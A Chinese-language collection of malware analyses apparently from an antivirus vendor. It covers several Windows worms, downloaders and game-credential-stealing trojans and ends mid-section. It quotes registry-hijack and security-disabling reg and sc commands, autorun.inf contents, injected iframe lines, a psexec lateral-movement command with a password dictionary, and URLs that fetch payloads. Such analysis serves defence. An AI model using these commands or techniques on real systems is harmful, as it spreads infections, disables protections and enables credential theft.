“注入木马下载器变种RJH”病毒技术细节
病毒运行后首先会判断System32路径下是否有guangd.exe这个文件,如果不存在则病毒没有在用户机器中运行过,然后病毒会进行初始化工作;如果存在这个文件,病毒则会实现下载功能:
初始化操作:
病毒首先会把系统时间改为2005-10-31,使得卡巴斯基杀毒软件失效。
然后遍历进程查找进程中是否存在以下反病毒软件进程,如果存在,则结束进程:
360rpt.exe、360Safe.exe、360tray.exe、adam.exe、AgentSvr.exe、AppSvc32.exe、autoruns.exe、avgrssvc.exe、AvMonitor.exe、avp.com、avp.exenod32krn.exe、nod32kui.exe、PFW.exe、PFWLiveUpdate.exe、QHSET.exe、Ras.exe、Rav.exe、RavMon.exe、RavMonD.exe…
然后添加以下注册表项实现映像劫持,使得用户启动以下进程时启动病毒程序:
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions
\360rpt.exe\Debugger = "C:\WINDOWS\system32\guangd.exe"
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions
\IceSword.exe\Debugger = "C:\WINDOWS\system32\guangd.exe"…
然后在System32路径下释放病毒程序guangd.exe并添加以下注册表启动项实现自启动
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"DsNiu" = C:\WINDOWS\system32\guangd.exe
然后病毒会遍历磁盘,把自己命名为guangd.exe拷贝到所有的磁盘中,添加autorun.inf得用户双击打开磁盘时同时运行病毒
然后把System32的释放的病毒程序运行起来,最后病毒会在TEMP文件夹中释放自删除文件~DsNiu!.bat把自己删除。
下载操作:
病毒会启动两个svchost.exe进程,然后病毒会用自身内存映像覆盖这两个svchost.exe进程的内存空间,使用户认为该进程是正常的系统进程,同时这两个进程会互相进行保护,如果这两个进程中的任意一个进程被用户结束,则另一个进程会重新运行病毒程序,使得用户无法手动结束该进程。
病毒会每隔60秒从http://bibo.xxxx.org/gdxiazai.txt网址下载病毒程序并运行。
“鲁欧蠕虫”病毒技术细节
这是一个Delphi编写的蠕虫病毒,使用UPX进行加壳保护
病毒运行后,使用GetSystemDirectory获得系统%SYSTEM32%目录,并将自身复制过去.
病毒使用CreateMutexA创建一个"SOS"的互斥,保证当前只有一个实例在运行.
病毒会在当前目前中创建一个和病毒名相同的bat文件并运行,其中BAT文件的内容为:
:try
del %FILENAME%
if exist %FILENAME% goto try
del %0
病毒会遍历本地所有磁盘,在后缀为htm的文件的最后一行添加如下代码:
<iframe src="http://www.XXXX.cn/all/index.htm?a" width="50" height="0"></iframe>
病毒会使用ShellExecuteA和Winexec运行下列代码,修改注册表:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v
DisableWindowsUpdateAccess /t REG_dword/d 00000001 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
/v DisableTaskMgr /t REG_dword /d
00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced"
/v Hidden /t reg_dWord /d 00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v HideFileExt /t reg_dword /d 00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v ShowSuperHidden /t reg_dword /d
00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v ShowSuperHidden /t reg_dword /d
00000000 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL" /v CheckedValue /t
REG_SZ /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN" /v CheckedValue /t
REG_dword /d 00000002 /f
病毒会使用UrlDownloadFile从网址http://www.XXXX.cn/xzz/xxxxx下载这个文件并保存在C:\WINNT\System32\FSEc.COM的位置上
如果下载失败,则继续从网址http://www.XXXX.cn/xzz/xxxxx下载另一个文件保存在C:\WINNT\SYSTEM32\Stvch.exe的位置上,并运行
病毒会使用SetSystemTime将系统时间改为2000年,这么做的目的很明显是为了使AVP杀毒软件失效.
最后病毒,使用SetTimer函数,在回调中,向本地所有磁盘写入autorun.inf和病毒本身,其中autorun.inf的内容为:
[AuToRuN]
open=soS.Exe
shell\open=打开(&O)
shell\open\Command=soS.Exe
shell\open\Default=1
“反病毒杀手变种CR”病毒技术细节
这是一个Delphi编写的蠕虫病毒,病毒可以通过移动存储设备传播,本身具有下载可疑文件并运行的功能,病毒会关闭杀毒软件的服务和监视其系统进程,反杀毒软件查杀。
1.准备阶段:
创建名为"moomak"的互斥量,保证用户系统中只有病毒的一个实体运行。
2.病毒代码主要实现如下功能:
(1)写system.ini文件,实现启动自动加载
病毒会修改system.ini,内容如下:
SYSTEM.INI\BOOT
"SHELL" = EXPLORER.EXE APPDLLMAN.EXE
这样当系统启动加载Explorer.exe时,会将appdllman.exe文件自动加载起来。
(2)提升自身权限
病毒会调用SeDebugPrivilege、AdjustTokenPrivileges等API函数,实现将权限提升,方便后面的病毒功能实现。
(3)监视系统进程
<1>.病毒会查找指定安全产品和系统调试工具的进程,结束其进程;编辑注册表,添加这些文件的映像劫持调试关联项,将该关联指向病毒文件,当用户启动这些安全产品文件时,会将病毒文件启动起来。
修改注册表内容格式如下:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\指定文件名
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
指定文件名\debugger = "c:\windows\system32\appdllman.exe"
病毒查找的安全产品的主文件对应的进程名(指定文件名)如下:
"360tray.exe","360safe.exe","Ras.exe","clean.exe","HijackThis.exe",
"RogueCleaner.exe","KVXP.kxp","KVCenter.kxp","TrojDie.kxp",
"regedit.exe","msconfig.exe","taskmgr.exe"等。
<2>.病毒会结束指定的安全产品的服务
病毒会调用ControlService函数,将其参数设为SERVICE_CONTROL_STOP,结束指定服务后将其服务删除。
指定服务如下:
"RogueCleaner.exe","cltnetcnservice","eectrl","NOD32krn","Schedule","sharedaccess",
"RsCCenter","RsRavMon","KVWSC"等。
(4)复制文件到系统指定目录下,指定路径如下:
"c:\\windows\\system32\\appdllman.exe"
(5)构造并拷贝Autorun.inf文件
在最初病毒体同目录下创建Autorun.inf文件,内容如下:
[AutoRun]
open=appdllman.exe
shell\open=打开(&O)
shell\open\Command=appdllman.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=appdllman.exe
在没有关闭自动播放功能的系统中,如用户以双击鼠标左键、单击右键选择打开或资源管理器打开磁盘时,会将Autorun.inf中写入的关联文件appdllman.exe启动起来(其中appdllman.exe和最初的病毒样本名相同)。
病毒会将生成的Autorun.inf文件复制到系统中磁盘类型为DRIVE_REMOVABLE和DRIVE_FIXED的根目录下,并将病毒文件以Autorun.inf中关联的文件名复制到同路径下。
(6)下载指定可疑文件并运行
下载列表为:
http://{BLOCKED} /mm/mh.exe
http://{BLOCKED}/mm/zt.exe
http://{BLOCKED}/mm/wo.exe
http://{BLOCKED}/mm/dh.exe
http://{BLOCKED}/mm/chd.exe
http://{BLOCKED}/mm/my.exe
http://{BLOCKED}/mm/qq.exe
http://{BLOCKED}/mm/tl.exe
http://{BLOCKED}/mm/wd.exe
http://{BLOCKED}/mm/zx.exe
http://{BLOCKED}/mm/wl.exe
http://{BLOCKED}/mm/cs.exe
http://{BLOCKED}/mm/jh.exe
http://{BLOCKED}/mm/func.exe
存储名为:
c:\windows\system32\func.dll
c:\windows\system32\svch0st.exe
c:\windows\system32\svch0st1.exe
c:\windows\system32\svch0st2.exe
c:\windows\system32\svch0st3.exe
c:\windows\system32\svch0st4.exe
c:\windows\system32\svch0st5.exe
c:\windows\system32\svch0st6.exe
c:\windows\system32\svch0st7.exe
c:\windows\system32\svch0st8.exe
c:\windows\system32\svch0st9.exe
c:\windows\system32\svch0st10.exe
c:\windows\system32\svch0st11.exe
c:\windows\system32\svch0st13.exe
(7)修改注册表
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"realplayer" = |?
(8)起线程判断网络连接
病毒会创建NetBIOSThread的互斥量,每隔1秒判断系统联网状态,如果系统联网则创建自身连接。
(9)构造并运行Deleteme.bat
创建名为_deleteme.bat的脚本文件,功能为当病毒运行后,删除最初的病毒体,并删除该脚本自身。
3.该病毒特点
(1)病毒具有较强的反杀毒软件反调试功能,病毒清除过程较为复杂。
(2)病毒支持文件下载,对用户造成的实际危害较难预测,但具备造成极大危害的可能性,并可通过此手段方便的进行病毒体的更新。
这个是一个蠕虫型病毒,通过枚举局域网地址、获取被感染者当前的连接、下载ip地址信息的方式获取ip地址,并对这些地址尝试进行传播。病毒同时下载程序进行运行。病毒由VC6语言编写,加壳保护。
1、检查运行状态:
病毒运行后首先检测自己的是否是以“%system32%\IME\svchost.exe”运行,如不是则进行复制自己等初始化操作,反之则以服务方式运行。
2、初始化操作:
病毒删除“%system32%\IME\svchost.exe”,然后复制自己为该文件,并将属性设置为系统、隐藏,然后病毒调用CreateProcessA启动“%system32%\IME\svchost.exe”。
病毒启动“%system32%\IME\svchost.exe”后,释放批处理文件rs.bat并执行,以此来删除自己。
3、注册为服务运行:
病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数,注册名称为“Alerter COM+”、目标为“%system32%\IME\svchost.exe”的服务,然后调用StartServiceA启动服务。
4、病毒的服务过程
病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量,如失败则退出,以此来保证只有一个服务实例在运行。
病毒启动4个工作线程尝试进行网络传播和下载(详细见后面)。
病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制(详细见后面)。
病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口,并启动消息循环,然后向该窗口发送WM_DEVICECHANGE消息。
5、在固定磁盘中建立AutoRun实现自启动:
病毒根据标志(写在病毒内,推测为生成病毒时设置的)决定是否对固定硬盘建立自动运行机制。
如标志为建立,病毒对c到z逻辑盘调用GetDriveTypeA ,对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。
病毒复制自己到该逻辑盘根目录下,名称为“setup.exe”,并生成AutoRun.inf文件以达到自动运行,病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。
6、窗口消息处理:
在窗口循环中,病毒处理如下消息:
WM_CLOSE、WM_DESTROY消息,病毒调用默认窗口处理过程。
WM_CREATE消息,在窗口生成的时候,病毒调用SetTimer建立两个Timer,间隔为1秒和20分钟,回调方式为接收WM_TIMER消息。
WM_TIMER消息,病毒没隔1秒调用破坏反病毒软件和复制自己的代码(详细见后面),每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\down.exe并运行。
WM_DEVICECHANGE消息,病毒通过处理该消息得到新插入的可移动设备,并对该设备进行感染(写入病毒并建立AutoRun机制)。
7、破坏反病毒软件和复写文件:
病毒在通过处理WM_TIMER消息,每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口,检测其窗口标题中是否是或包含如下内容:
Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒
如包含这些内容,病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口,以此来破坏反病毒软件的运行。
病毒通过处理WM_TIMER消息,每隔1秒复制自己并复写注册表,以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe,并写入如下注册表信息:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Program file" = %SYSTEM%\PROGMON.EXE
工作线程1:
病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\BindF.exe并运行。
工作线程2:
病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\目录:
ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe
病毒获取当前网段(例如193.168.0.55),并将最后一个字段替换为%s2-%s255,然后以如下参数启动ArpW.exe。
“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"”
病毒通过下载的Arp欺骗病毒,将代码插入局域网中的http包中。
工作线程3:
病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。
在此线程中,病毒每隔30分钟循环执行如下代码感染网络:
(1)感染局域网计算机。病毒获取本机ip后以此遍历局域网,通过自带的用户名和密码字典(见后面)尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录,然后以如下命令行启动psexec.exe。
"%system32%\psexec.exe \\192.168.0.2 -u 用户名 -p "密码" -c %system32%\servrr.exe -d"
(2)感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp",并通过在其中搜索“input name=\"ip\”来获取ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
(3)感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
用户名和密码字典如下:
用户名:administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser
密码:NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini
工作线程4:
病毒每隔1秒,循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。
8、病毒的感染代码:
在病毒体中包含了感染代码,但病毒本身并未调用。该感染代码中存在api地址硬编码等问题,在运行时会出现问题。
在感染代码中保护如下操作:
病毒首先复制自己为%system32\drivers\svchost.exe。
病毒将自己复制到如下目录,名称为随机文件名.exe:
%system32\drivers\、%system32\dllcache\、%system32\IME\
c:\Program Files\Common Files\Microsoft Shared\、
c:\Program Files\Internet Explorer\Connection Wizard\、
c:\Program Files\Windows Media Player\、
c:\WINDOWS\addins\、
c:\WINDOWS\system\
病毒遍历c到z的逻辑盘,对所有目录进行感染,但排除保护如下字符串的目录:
Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。
病毒只感染后缀名为exe的pe可执行文件,感染时病毒在被感染文件的代码节的最后的内容为0的地方(为文件对齐补的)写入病毒代码,并将pe头中入口点改为指向病毒代码。
在感染的病毒代码中,病毒调用CreateProcessA(该函数地址为感染时写入的硬编码)启动“C:\WINDOWS\system32\drivers\mmaou.exe”(感染时写入,文件为感染时复制的病毒本身),然后通过记录的原入口点跳回原程序正常入口点执行。
“VB破坏者变种N”病毒技术细节
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
Winstary = C:\WINDOWS\system32\SDGames.exe
HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows
load = C:\WINDOWS\system32\SDGames.exe
run = C:\WINDOWS\system32\SDGames.exe
执行以下CMD命令实现关闭防火墙等功能
sc config winmgmt start= AUTO & net start winmgmt & quit
sc config lanmanserver start= AUTO & net start lanmanserver & quit
sc config Alg Start= disabled & net stop Alg
sc config sharedaccess Start= disabled & net stop sharedaccess
释放脚本文件Taskeep.vbs,该脚本每隔2秒查找进程中是否存在病毒进程,如果没有则重新运行病毒程序.查找网络共享磁盘,如果找到把自己复制到该文件夹命名为xcopy.exe添autorun.inf文件使得用户打开磁盘时同时运行病毒。释放netshare.cmd文件,把用户所有磁盘都改为共享磁盘。遍历本机的脚本文件和可执行文件,对于脚本文件,在其后面添加以下代码src="http://zhidaobaidu.10mb.cn/",使得用户运行脚本时打开该网页;对于可执行文件,病毒会把自己覆盖到正常文件,使得正常可执行文件被破坏。病毒会把自己复制到本地所有磁盘中,添autorun.inf文件使得用户打开磁盘时同时运行病毒。从http://coolkiller.go1.icpcn.com/QQ.gif下载病毒程序。把系统时间的年份改为2030年,使得卡巴斯基杀毒软件失效.
然后修改以下注册表键值实现禁用注册表编辑器、任务管理器等功能
HKEY_CLASSES_ROOT\txtfile\shell\open\
Command = C:\WINDOWS\system32\SDGames.exe
HKEY_CLASSES_ROOT\regfile\shell\open\
Command = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
start page = wangma
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
start page = http://www.zhidaobaidu.10mb.cn/
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
default_page_url = wangma
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
default_page_url = wangma
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\policies\system
disabletaskmgr = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\policies\system
disableregistrytools = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Explorer
nosettaskbar = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HideFileExt = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden = 2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL
CheckedValue = 0
然后修改以下注册表键值实现镜像劫持,使得用户运行以下程序时都会运行病毒程序:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\360rpt.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\Trojanwall.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\KvReport.kxp\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\QQ.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
最后释放Avpser.cmd文件,该程序遍历进程查找进程中是否存在以下反病毒软件进程,如果存在则结束该进程:
RavMonD.exe RavStub.exe avp.exe 360safe.exe
“自动运行蠕虫变种JPH ”病毒技术细节
1.病毒自复制:病毒运行后复制自身到%system%目录,命名为cross.exe。
2.开机自启动:病毒通过函数WinExec调用系统注册表工具reg.exe修改注册表实现开机自启动。修改的键值如下:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“crsss”=%system%\cross.exe
3.可移动磁盘传播:该病毒会向磁盘根目录写入自身命名为TNT.Exe和与之对应的Autorun.inf文件,Autorun.inf文件的内容如下:
[AuToRun]
open=TNT.Exe
shell\open=打开(&O)
shell\open\Command=TNT.Exe
shell\open\Default=1
当用户打开磁盘会运行该病毒文件
4.下载可疑文件:该病毒调用URLDownloadToFile下载http://n.XXXX.com/xx.dll保存到%system%\xx.dll。
5.浏览指定网页:调用CreateProcess创建iexplore.exe进程,后台浏览如下网页。
http:// XXXX.com/xx/TJ.ASP
http://n. XXXX.com/xx.htm
“传奇终结者变种YZM ”病毒技术细节
病毒主文件的分析如下:
1.初始化:调用LoadLibraryA加载kernel32.dll,user32.dll,获取ExitProcess的函数地址。
2.病毒运行后会创建副本以及释放动态库文件到本地系统的指定目录。
%WINNT%\Fonts\gjcuaxw.fon
%System%\gjcscyc.dll
%System%\gjcsczc.exe
%WINNT%\Fonts\gjcscss.dll
(1)gjcsczc.exe为病毒文件存放到系统中的文件副本。病毒会查找%System%目录下是否存在文件名为gjcsczc.exe的文件,如果有会将其属性设置为Normal后删除该文件,然后将病毒文件以此名称复制到该目录下。
(2)gjcscyc.dll为病毒释放的动态库文件,病毒放出该动态库后会将该文件属性设置为SYSTEM、HIDDEN。
(3)gjcuaxw.fon和gjcscss.dll为配置文件,用于存放病毒通信地址,病毒通过调用WritePrivateProfileString分别向生成文件gjcuaxw.fon和gjcscss.dll中写入如下内容:
[Send]
Url1=12E4F8F8FCB6A3A3FBFBFBA2FBEFBEBCBCB5A2EFE2A3EAE0F5BEBCBDBCA3FBFFE1A2EDFFFC
[Send]
Url1=http://www.xxxxxx.cn/fly2010/wsm.asp;
3.修改注册表项,实现病毒文件动态库的开机加载。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\ShellExecuteHooks"{3FA10261-B890-F432-A453-69F1023513F3}" = GJCSCYC.DLL
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3FA10261-B890-F432-A453-69F1023513F3}
4.病毒会将%System%\gjcsczc.exe文件运行起来,然后以原病毒文件名为参数在C盘根目录下构造文件名为DFD开头的脚本文件,然后运行该脚本实现病毒原文件的自删除,以及该脚本文件的自删除功能。
5.病毒会比较系统中是否存在woool.dat的游戏进程,如果存在则结束其进程。使得用户需要重新登陆游戏,方便实现病毒动态库文件的驻入。
6.病毒会将释放出的动态库sidjhzy.dll加载起来,然后起线程调用动态库中的EnHookWindow函数实现挂消息钩子,在接收消息钩子的进程中加载病毒动态库的功能。
病毒动态库的分析如下:
病毒加载并起线程调用动态库中的EnHookWindow函数实现挂消息钩子,在接收消息钩子的进程中加载该病毒动态库实现其窃取用户登录信息的主要功能。sidjhzy.dll的具体功能如下:
1.病毒会通过挂键盘和鼠标的钩子将动态库文件驻入到接收键盘和鼠标消息的进程中。
2.病毒会结束TQAT.exe(反外挂软件)进程。
3.病毒会起专门的线程,通过修改游戏代码,直接在内存中读取指定数据,获取用户的游戏登陆信息,通过HTTP方式发送到木马散播者的指定的URL。
4.病毒会添加或修改如下注册项,破坏系统的安全设置(禁用Windows自动更新、禁用防火墙的功能):
HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters
\FirewallPolicy\Standard Profile Enable Firewall = 0
“梅勒斯下载器变种KO”病毒技术细节
如果没有首先创建一个名为sos的互斥体防止进程有多个病毒实例运行。
然后把自己复制到System32路径下命名为TxoMoU.Exe,添加以下注册表项实现自启动:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crsss =
"C:\WINDOWS\system32\TxoMoU.Exe
然后病毒修改以下注册表项实现不显示隐藏文件、禁用任务管理器、禁止Windows升级功能:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate\
DisableWindowsUpdateAccess = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableTaskMgr = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HideFileExt = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced\
Hidden = 0
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
ShowSuperHidden = 0
每隔1分钟从以下网址下载病毒程序:
http://sss.xxxxxx.com/url.txt
http://sss.xxxxxx.com/IE.txt
每隔1秒查找360安全卫士进程,如果找到则结束该进程。修改系统时间为2000年,使得卡巴斯基杀毒软件失效。病毒每隔0.2秒把自己复制到本地所有磁盘中,添autorun.inf文件使得用户打开磁盘时同时运行病毒。最后病毒每隔5秒进行以下操作:
查找有以下字符串的窗口并发送WM_CLOSE消息关闭该窗口: 检测、木马、病毒。修改以下注册表键值使得修改IE主页失效。
HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\
HomePage = 1
删除用户系统中所有的.GHO文件。
“刀剑Online木马”病毒技术细节
1.病毒运行后会将病毒创建副本以及释放动态库文件到本地系统中的指定位置,放出文件后执行脚本文件会将自身删除:
%WinNT%\Fonts\cadaafx.fon
%System%\sidjhzy.dll
%System%\sidjhaz.exe
%WinNT%\Fonts\sidjhcsa.dll
其中sidjhzy.dll为病毒释放的动态库文件,病毒将加载此动态库实现主要功能; cadaafx.fon和sidjhcsa.dll为配置文件,存放病毒通信地址;病毒会将idjhzy.dll的属性设置为系统隐藏, sidjhcsa.dll的文件属性设置为Normal。病毒会放出文件名以DFD开头的脚本文件,病毒运行后会调用脚本实现病毒原文件的自删除,删除后,脚本文件会自动删除本身。
2.病毒的主要功能通过加载其释放出的动态库sidjhzy.dll实现,其动态库文件的具体功能如下:
(1)病毒会通过挂键盘和鼠标的钩子将动态库文件驻入到接收键盘和鼠标消息的进程中。
(2)病毒会结束TQAT.exe(反外挂软件)进程。
(3)病毒会结束游戏进程BO.EXE使得用户重新登陆偷取用户登陆信息。
(4)病毒将起线程直接到内存中读取指定数据,获取用户的信息,通过HTTP方式发送到木马散播者的设定的URL---Http://www.XXXXXX.cn/xk4/post.asp中。
(5)病毒会添加或修改如下注册项,破坏系统的安全设置(禁用Windows自动更新、禁用防火墙的功能):
HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters
\FirewallPolicy\ Standard Profile
Enable Firewall = 0
添加如下注册表项实现病毒DLL的注入:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
"AppInit_DLLs" = SIDJHZY.DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\ShellExecuteHooks"{88847374-8323-FADC-B443-4732ABCD3788}" = SIDJHZY.DLL
“BAT代理蠕虫变种C”病毒技术细节
VBS的内容为:
wscript.createobject("wscript.shell").run """qq.bat"" /start",0
查找网络共享文件夹,如果找到就把自己拷到该文件夹中并添加autorun.inf和病毒的同名VBS脚本使得用户打开该文件夹时同时运行病毒。
把自己复制到本地所有磁盘中,添autorun.inf文件和病毒的同名VBS脚本使得用户打开磁盘时同时运行病毒。
autorun.inf的内容为:
open=wscript.exe qq.vbe
shell\open\Command=wscript.exe qq.vbe
shell\explore\Command=wscript.exe qq.vbe
shell\find\Command=wscript.exe qq.vbe
删除各个磁盘下的U盘保护程序,如:Anti-U盘免疫.bat、U盘病毒分析.bat。
在系统盘下生成名为“已经被反U盘病毒的“病毒”感染.txt”的文件文件,提示用户已经中毒。
最后病毒会每隔10秒通过cmd.exe启动自己,使得用户无法通过删除文件来清除病毒。
“下载者蠕虫变种N”病毒技术细节
此程序为Worm类型程序
1、病毒运行后把系统时间往后调21年。让一些杀软过期,这样可以轻松躲过杀毒软件。
2、自我复制到系统中,让用户不能轻意找到它。病毒会把自己复制到
C:\WINDOWS\system32\IME\svchost.exe
C:\WINDOWS\system32\internt.exe
C:\WINDOWS\system32\progmon.exe
并把文件属性设置为隐藏,使用户不能在正常方式下看到文件。
3、修改注册表项,当系统启动时,病毒随系统一同启动。
(1)禁止用户查看隐藏文件:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL
"CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
Program file" = %SYSTEM%\PROGMON.EXE
(2)用启用服务的方式,把自己启动
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Alerter COM+(Display Name)Alerter COM+ = (IMAGEPATH)%SYSTEM%\IME\SVCHOST.EXE
4、自动在%system32%temp生成RS.Bat把自己删除,清理痕迹。
5、下载:
启动一个例程,创建一个互斥:Alerter COM+,保证进程中只有一个病毒在运行。
从下列网址下载并运行病毒。http://www.xxx.com/yxyhack/muma.exe|http://blog.csdn.net/yxyhack/muma2.exe
6、反杀毒软件
(1) 把系统时间向后调21年,使杀软过期。
(2)关闭含有特殊字符串的窗口
7、传播
病毒会遍历C盘到Z盘,在每个磁盘目录下建立autorun.inf。尝试暴力猜取局域网密码,并把自己传播到局域网的机器中。
8、在本机打开一个端口,去连接指定地址。控制端可以通过这个端口来发送命令来控制本机。
“病毒下载器变种S”病毒技术细节
感染方法:
病毒感染文件时,在被感染文件最后新增一个大小为0x1FE大小的节并将病毒体写入。
病毒体将被感染文件的原入口点保存在最后一个节的开始处,并将PE结构中的入口点修改为指向病毒体(最后一个节)的偏移0xC1处。
感染的代码:
1、定位Kernel32.dll基址
病毒在程序入口处获取堆栈顶的值(位于Kernel32.dll内存空间),然后利用这个值按页对齐大小向前搜索,通过搜索PE文件标志“MZ”的方式获取Kernel32.dll的基址。
2、获取API
病毒获取Kernel32.dll基址后,从基址开始搜索字符串“GetProcAddress”,以此定位该函数的导出地址。获取GetProcAddress函数地址后,病毒调用该函数获取如下函数地址并保存:ExitProcess、CreateThread、WinExec、LoadLibraryA
3、启动下载线程:
病毒调用CreateThread启动下载线程,下载线程的地址在病毒体偏移0x1A8处。
4、下载线程:
病毒调用LoadLibraryA加载Urlmon并获取URLDownloadToFileA函数的地址,然后调用URLDownloadToFileA尝试下载"http://usd.88xxx.net/down/n.exe"为"C:\Program Files\svchost.exe",如果下载成功,病毒调用WinExec执行该文件。
5、返回入口点:
